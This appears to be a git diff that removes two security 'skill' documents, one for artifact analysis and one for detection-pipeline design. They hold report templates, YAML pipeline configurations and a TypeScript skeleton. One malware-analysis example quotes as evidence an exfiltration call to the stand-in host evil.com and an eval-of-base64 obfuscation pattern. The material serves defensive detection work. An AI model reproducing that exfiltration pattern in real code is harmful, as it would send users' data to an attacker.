176
|
-
## Artifact Analysis Report
|
|
177
|
-
|
|
178
|
-
```
|
|
179
|
-
Artifact Analysis Report
|
|
180
|
-
========================
|
|
181
|
-
|
|
182
|
-
Artifact: [filename, path, hash]
|
|
183
|
-
Type: [source_code|binary|config|log]
|
|
184
|
-
Analysis Date: [timestamp]
|
|
185
|
-
Confidence: [High|Medium|Low]
|
|
186
|
-
|
|
187
|
-
## Findings
|
|
188
|
-
|
|
189
|
-
### 1. [Finding Name]
|
|
190
|
-
Severity: [Critical|High|Medium|Low]
|
|
191
|
-
Location: [file:line or offset]
|
|
192
|
-
Evidence: [exact match, hex dump, string]
|
|
193
|
-
Framework: [ATT&CK T1059, OWASP A1, CWE-78]
|
|
194
|
-
Recommendation: [how to fix/mitigate]
|
|
195
|
-
|
|
196
|
-
### 2. [Finding Name]
|
|
197
|
-
...
|
|
198
|
-
|
|
199
|
-
## IOCs Extracted
|
|
200
|
-
|
|
201
|
-
- IPs/Domains: [list]
|
|
202
|
-
- Hashes: [list]
|
|
203
|
-
- Credentials: [list]
|
|
204
|
-
- URLs: [list]
|
|
205
|
-
|
|
206
|
-
## Correlation
|
|
207
|
-
|
|
208
|
-
- Git History: [recent commits, authors]
|
|
209
|
-
- Related Artifacts: [files with similar patterns]
|
|
210
|
-
- Incident Context: [if part of investigation]
|
|
211
|
-
|
|
212
|
-
## Conclusion
|
|
213
|
-
|
|
214
|
-
[Overall assessment, confidence, next actions]
|
|
215
|
-
```
|
|
216
|
-
|
|
217
|
-
## Analysis Examples
|
|
218
|
-
|
|
219
|
-
### Example 1: JavaScript Malware Analysis
|
|
220
|
-
|
|
221
|
-
```yaml
|
|
222
|
-
artifact:
|
|
223
|
-
file: suspicious.js
|
|
224
|
-
type: source_code
|
|
225
|
-
size: 2.4KB
|
|
226
|
-
|
|
227
|
-
analysis:
|
|
228
|
-
static_findings:
|
|
229
|
-
- type: obfuscation
|
|
230
|
-
evidence: "eval(atob(base64_string))"
|
|
231
|
-
severity: high
|
|
232
|
-
- type: network_indicators
|
|
233
|
-
evidence: "fetch('https://evil.com/exfil')"
|
|
234
|
-
severity: critical
|
|
235
|
-
iocs:
|
|
236
|
-
- type: domain
|
|
237
|
-
value: evil.com
|
|
238
|
-
- type: technique
|
|
239
|
-
value: command_and_control
|
|
240
|
-
framework_mapping:
|
|
241
|
-
MITRE: [T1059.003 JavaScript, T1071.001 C2]
|
|
242
|
-
OWASP: [A7:2017 Security Misconfiguration]
|
|
243
|
-
```
|
|
244
|
-
|
|
245
|
-
### Example 2: Configuration Secret Detection
|
|
246
|
-
|
|
247
|
-
```yaml
|
|
248
|
-
artifact:
|
|
249
|
-
file: config.json
|
|
250
|
-
type: config
|
|
251
|
-
findings:
|
|
252
|
-
- type: hardcoded_secret
|
|
253
|
-
location: line 23
|
|
254
|
-
evidence: '"api_key": "sk-live-abc123xyz"'
|
|
255
|
-
severity: critical
|
|
256
|
-
- type: insecure_transport
|
|
257
|
-
location: line 45
|
|
258
|
-
evidence: '"protocol": "http"'
|
|
259
|
-
severity: high
|
|
260
|
-
```
|
|
261
|
-
|
|
262
|
-
## Anti-Patterns
|
|
263
|
-
|
|
264
|
-
- **Don't** analyze without collecting metadata first (missing context)
|
|
265
|
-
- **Don't** skip type identification (wrong analysis approach)
|
|
266
|
-
- **Don't** skip validation of IOCs (false positives)
|
|
267
|
-
- **Don't** skip framework mapping (missing MITRE/OWASP context)
|
|
268
|
-
- **Don't** skip correlation with other artifacts (missing campaign context)
|
|
269
|
-
|
|
270
|
-
## Enforcement — Artifact Analysis Gate
|
|
271
|
-
|
|
272
|
-
**Before reporting findings, verify:**
|
|
273
|
-
|
|
274
|
-
- [ ] Artifact type identified and confirmed (source code / binary / config / log)
|
|
275
|
-
- [ ] Analysis approach matches artifact type (static analysis, sandbox, syntax validation)
|
|
276
|
-
- [ ] At least one finding with evidence and severity
|
|
277
|
-
- [ ] IOCs validated (not just regex match)
|
|
278
|
-
- [ ] Framework mapping included (MITRE ATT&CK, OWASP, or CWE)
|
|
279
|
-
- [ ] Report includes confidence level and recommendations
|
|
280
|
-
|
|
281
|
-
If ANY answer is NO → Stop. State what's missing. Do not report findings.
|
|
282
|
-
|
|
283
|
-
## Tools
|
|
284
|
-
|
|
285
|
-
| Tool | Purpose |
|
|
286
|
-
|------|---------|
|
|
287
|
-
| `rg` (ripgrep) | Pattern search, IOC extraction |
|
|
288
|
-
| `semgrep` | AST-based analysis |
|
|
289
|
-
| `jq` | JSON/YAML parsing |
|
|
290
|
-
| `strings` | Binary string extraction |
|
|
291
|
-
| `file` | File type identification |
|
|
292
|
-
| `xxd` | Hex dump analysis |
|
|
293
|
-
|
|
294
|
-
## Verification
|
|
295
|
-
|
|
296
|
-
For artifact analysis changes:
|
|
297
|
-
```bash
|
|
298
|
-
cd pi-crew
|
|
299
|
-
npx tsc --noEmit
|
|
300
|
-
node --experimental-strip-types --test test/unit/artifact-analysis.test.ts
|
|
301
|
-
```
|
|
302
|
-
|
|
303
|
-
*See also: `event-log-tracing` for log analysis, `threat-hypothesis-framework` for investigation methodology.*
|
|
@@ -1,286 +0,0 @@
|
|
|
1
|
-
---
|
|
2
|
-
name: detection-pipeline-design
|
|
3
|
-
description: "Design data pipelines for security monitoring and threat intelligence."
|
|
4
|
-
origin: distilled:anthropic-cybersecurity-skills
|
|
5
|
-
triggers:
|
|
6
|
-
- "build pipeline"
|
|
7
|
-
- "design detection"
|
|
8
|
-
- "setup monitoring"
|
|
9
|
-
- "enrich data"
|
|
10
|
-
- "threat intelligence"
|
|
11
|
-
---
|
|
12
|
-
# detection-pipeline-design
|
|
13
|
-
|
|
14
|
-
Use this skill when designing data pipelines for security detection and enrichment.
|
|
15
|
-
|
|
16
|
-
## Source
|
|
17
|
-
|
|
18
|
-
Distilled from `building-ioc-enrichment-pipeline-with-opencti` (Anthropic Cybersecurity Skills) and generalized for software/build context.
|
|
19
|
-
|
|
20
|
-
## When to Use
|
|
21
|
-
|
|
22
|
-
- Building detection and monitoring systems
|
|
23
|
-
- Designing security data pipelines
|
|
24
|
-
- Setting up automated threat intelligence
|
|
25
|
-
- Creating alert enrichment workflows
|
|
26
|
-
- Integrating security scanning into CI/CD
|
|
27
|
-
|
|
28
|
-
## Pipeline Architecture
|
|
29
|
-
|
|
30
|
-
```
|
|
31
|
-
┌─────────┐ ┌──────────┐ ┌──────────┐ ┌─────────┐ ┌─────────┐
|
|
32
|
-
│ Input │ → │ Transform│ → │ Enrich │ → │ Score │ → │ Route │
|
|
33
|
-
│ Data │ │ (Norm) │ │ (Context)│ │ (Conf) │ │(Action) │
|
|
34
|
-
└─────────┘ └──────────┘ └──────────┘ └─────────┘ └─────────┘
|
|
35
|
-
↓
|
|
36
|
-
┌──────────┐
|
|
37
|
-
│ Output │
|
|
38
|
-
│ Findings │
|
|
39
|
-
└──────────┘
|
|
40
|
-
```
|
|
41
|
-
|
|
42
|
-
## Pipeline Components
|
|
43
|
-
|
|
44
|
-
### 1. Input Stage
|
|
45
|
-
|
|
46
|
-
```yaml
|
|
47
|
-
input:
|
|
48
|
-
types:
|
|
49
|
-
- name: file_change
|
|
50
|
-
sources: [git, filesystem]
|
|
51
|
-
- name: log_event
|
|
52
|
-
sources: [application, system]
|
|
53
|
-
- name: alert
|
|
54
|
-
sources: [scanner, monitor]
|
|
55
|
-
- name: dependency
|
|
56
|
-
sources: [npm, pip, cargo]
|
|
57
|
-
format: [json, plain_text, structured]
|
|
58
|
-
polling: [real_time, batch, scheduled]
|
|
59
|
-
```
|
|
60
|
-
|
|
61
|
-
### 2. Transform Stage
|
|
62
|
-
|
|
63
|
-
```yaml
|
|
64
|
-
transform:
|
|
65
|
-
operations:
|
|
66
|
-
- name: normalize
|
|
67
|
-
description: Convert to standard format
|
|
68
|
-
output: stix_like_object
|
|
69
|
-
- name: extract_indicators
|
|
70
|
-
description: Pull out IOCs
|
|
71
|
-
extract: [ips, domains, hashes, credentials, tokens]
|
|
72
|
-
- name: enrich_metadata
|
|
73
|
-
description: Add context
|
|
74
|
-
add: [file_type, language, framework, timestamp]
|
|
75
|
-
output_format: json
|
|
76
|
-
```
|
|
77
|
-
|
|
78
|
-
### 3. Enrich Stage
|
|
79
|
-
|
|
80
|
-
```yaml
|
|
81
|
-
enrich:
|
|
82
|
-
internal_sources:
|
|
83
|
-
- name: vulnerability_db
|
|
84
|
-
query: [cve_id, cwe]
|
|
85
|
-
- name: code_analysis
|
|
86
|
-
query: [pattern, structure]
|
|
87
|
-
- name: git_history
|
|
88
|
-
query: [author, commit, diff]
|
|
89
|
-
external_sources:
|
|
90
|
-
- name: npm_audit
|
|
91
|
-
api: npmjs.org
|
|
92
|
-
- name: osv
|
|
93
|
-
api: osv.dev
|
|
94
|
-
- name: gh_advisory
|
|
95
|
-
api: github.com/advisories
|
|
96
|
-
async: true
|
|
97
|
-
timeout_ms: 5000
|
|
98
|
-
```
|
|
99
|
-
|
|
100
|
-
### 4. Score Stage
|
|
101
|
-
|
|
102
|
-
```yaml
|
|
103
|
-
score:
|
|
104
|
-
confidence_calculation:
|
|
105
|
-
factors:
|
|
106
|
-
- name: source_reliability
|
|
107
|
-
weight: 0.3
|
|
108
|
-
scale: [0-10]
|
|
109
|
-
- name: contextual_evidence
|
|
110
|
-
weight: 0.4
|
|
111
|
-
scale: [0-10]
|
|
112
|
-
- name: historical_matches
|
|
113
|
-
weight: 0.3
|
|
114
|
-
scale: [0-10]
|
|
115
|
-
formula: >
|
|
116
|
-
(reliability * 0.3) +
|
|
117
|
-
(evidence * 0.4) +
|
|
118
|
-
(historical * 0.3)
|
|
119
|
-
thresholds:
|
|
120
|
-
critical: [90-100]
|
|
121
|
-
high: [70-89]
|
|
122
|
-
medium: [40-69]
|
|
123
|
-
low: [0-39]
|
|
124
|
-
```
|
|
125
|
-
|
|
126
|
-
### 5. Route Stage
|
|
127
|
-
|
|
128
|
-
```yaml
|
|
129
|
-
route:
|
|
130
|
-
paths:
|
|
131
|
-
- condition: "score >= 90"
|
|
132
|
-
action: [alert, block, notify]
|
|
133
|
-
destination: [security_team, incident_response]
|
|
134
|
-
- condition: "score >= 70"
|
|
135
|
-
action: [alert, review]
|
|
136
|
-
destination: [security_queue]
|
|
137
|
-
- condition: "score >= 40"
|
|
138
|
-
action: [log, monitor]
|
|
139
|
-
destination: [security_logs]
|
|
140
|
-
- condition: "score < 40"
|
|
141
|
-
action: [ignore]
|
|
142
|
-
destination: []
|
|
143
|
-
```
|
|
144
|
-
|
|
145
|
-
## Pipeline Design Patterns
|
|
146
|
-
|
|
147
|
-
### Pattern 1: Real-time File Monitoring
|
|
148
|
-
|
|
149
|
-
```yaml
|
|
150
|
-
pipeline:
|
|
151
|
-
name: file-change-detection
|
|
152
|
-
trigger:
|
|
153
|
-
type: filesystem_watch
|
|
154
|
-
paths: ["src/**/*.ts", "src/**/*.js"]
|
|
155
|
-
transform:
|
|
156
|
-
- extract: [imports, function_calls, secrets]
|
|
157
|
-
enrich:
|
|
158
|
-
- check: npm_audit
|
|
159
|
-
- check: known_vulnerable_patterns
|
|
160
|
-
score:
|
|
161
|
-
- base: vulnerability_severity
|
|
162
|
-
- modifier: exploitability
|
|
163
|
-
route:
|
|
164
|
-
critical: slack_alert + block_merge
|
|
165
|
-
high: github_issue + notify
|
|
166
|
-
medium: log + track
|
|
167
|
-
```
|
|
168
|
-
|
|
169
|
-
### Pattern 2: Dependency Vulnerability Pipeline
|
|
170
|
-
|
|
171
|
-
```yaml
|
|
172
|
-
pipeline:
|
|
173
|
-
name: dependency-vuln-scan
|
|
174
|
-
trigger:
|
|
175
|
-
type: package_lock_change
|
|
176
|
-
transform:
|
|
177
|
-
- extract: [package_names, versions, sources]
|
|
178
|
-
enrich:
|
|
179
|
-
- query: osv_database
|
|
180
|
-
- query: npm_advisories
|
|
181
|
-
- query: github_advisories
|
|
182
|
-
score:
|
|
183
|
-
- base: cvss_score
|
|
184
|
-
- modifier: [has_exploit, is_dependencies]
|
|
185
|
-
route:
|
|
186
|
-
critical: [create_security_issue, alert_team]
|
|
187
|
-
high: [create_issue, schedule_fix]
|
|
188
|
-
medium: [add_to_backlog]
|
|
189
|
-
low: [note_in_changelog]
|
|
190
|
-
```
|
|
191
|
-
|
|
192
|
-
### Pattern 3: Secret Detection Pipeline
|
|
193
|
-
|
|
194
|
-
```yaml
|
|
195
|
-
pipeline:
|
|
196
|
-
name: secret-detection
|
|
197
|
-
trigger:
|
|
198
|
-
type: git_push
|
|
199
|
-
transform:
|
|
200
|
-
- extract: [api_keys, tokens, passwords, credentials]
|
|
201
|
-
enrich:
|
|
202
|
-
- validate: key_format
|
|
203
|
-
- check: blacklists
|
|
204
|
-
score:
|
|
205
|
-
- base: key_validity
|
|
206
|
-
- modifier: [key_age, exposure_scope]
|
|
207
|
-
route:
|
|
208
|
-
critical: [revoke_key, alert_security, block_push]
|
|
209
|
-
high: [notify_owner, rotate_key]
|
|
210
|
-
medium: [flag_for_review]
|
|
211
|
-
low: [log]
|
|
212
|
-
```
|
|
213
|
-
|
|
214
|
-
## Implementation Example
|
|
215
|
-
|
|
216
|
-
```typescript
|
|
217
|
-
interface DetectionPipeline {
|
|
218
|
-
name: string;
|
|
219
|
-
input: InputConfig;
|
|
220
|
-
transform: TransformConfig;
|
|
221
|
-
enrich: EnrichConfig;
|
|
222
|
-
score: ScoreConfig;
|
|
223
|
-
route: RouteConfig;
|
|
224
|
-
}
|
|
225
|
-
|
|
226
|
-
async function runPipeline(pipeline: DetectionPipeline, data: unknown): Promise<PipelineResult> {
|
|
227
|
-
// 1. Input validation
|
|
228
|
-
const normalized = normalizeInput(data, pipeline.input);
|
|
229
|
-
|
|
230
|
-
// 2. Transform - extract indicators
|
|
231
|
-
const indicators = extractIndicators(normalized, pipeline.transform);
|
|
232
|
-
|
|
233
|
-
// 3. Enrich - query external/internal sources
|
|
234
|
-
const enriched = await enrichIndicators(indicators, pipeline.enrich);
|
|
235
|
-
|
|
236
|
-
// 4. Score - calculate confidence
|
|
237
|
-
const scored = calculateScore(enriched, pipeline.score);
|
|
238
|
-
|
|
239
|
-
// 5. Route - determine action
|
|
240
|
-
const action = determineAction(scored, pipeline.route);
|
|
241
|
-
|
|
242
|
-
return { indicators, enriched, scored, action };
|
|
243
|
-
}
|
|
244
|
-
```
|
|
245
|
-
|
|
246
|
-
## Enforcement — Detection Pipeline Design Gate
|
|
247
|
-
|
|
248
|
-
**Before deploying detection pipelines, verify:**
|
|
249
|
-
|
|
250
|
-
- [ ] Input format validated before transform stage
|
|
251
|
-
- [ ] Scoring thresholds tuned to environment (not hardcoded defaults)
|
|
252
|
-
- [ ] Confidence calculation includes multiple factors (reliability, evidence, history)
|
|
253
|
-
- [ ] Route actions match score thresholds (critical → block, low → ignore)
|
|
254
|
-
- [ ] False positive rate measured and acceptable
|
|
255
|
-
- [ ] External API calls are async (non-blocking)
|
|
256
|
-
|
|
257
|
-
If ANY answer is NO → Stop. Tune the pipeline before deploying.
|
|
258
|
-
|
|
259
|
-
## Anti-Patterns
|
|
260
|
-
|
|
261
|
-
- **Don't** skip input validation (garbage in, garbage out)
|
|
262
|
-
- **Don't** skip enrichment (missing context leads to false positives)
|
|
263
|
-
- **Don't** use fixed thresholds (tune based on environment)
|
|
264
|
-
- **Don't** ignore false positive rates (kills analyst productivity)
|
|
265
|
-
- **Don't** block on external APIs in synchronous path (use async)
|
|
266
|
-
|
|
267
|
-
## Tools & Integrations
|
|
268
|
-
|
|
269
|
-
| Tool | Pipeline Role |
|
|
270
|
-
|------|---------------|
|
|
271
|
-
| `semgrep` | Static analysis, pattern matching |
|
|
272
|
-
| `npm audit` | Dependency vulnerability |
|
|
273
|
-
| `trufflehog` | Secret scanning |
|
|
274
|
-
| `grype` | Container vulnerability |
|
|
275
|
-
| `syft` | SBOM generation |
|
|
276
|
-
|
|
277
|
-
## Verification
|
|
278
|
-
|
|
279
|
-
For pipeline design changes:
|
|
280
|
-
```bash
|
|
281
|
-
cd pi-crew
|
|
282
|
-
npx tsc --noEmit
|
|
283
|
-
node --experimental-strip-types --test test/unit/detection-pipeline.test.ts
|
|
284
|
-
```
|
|
285
|
-
|
|
286
|
-
*See also: `security-review` skill for detection rule patterns and signature authoring guidance.*
|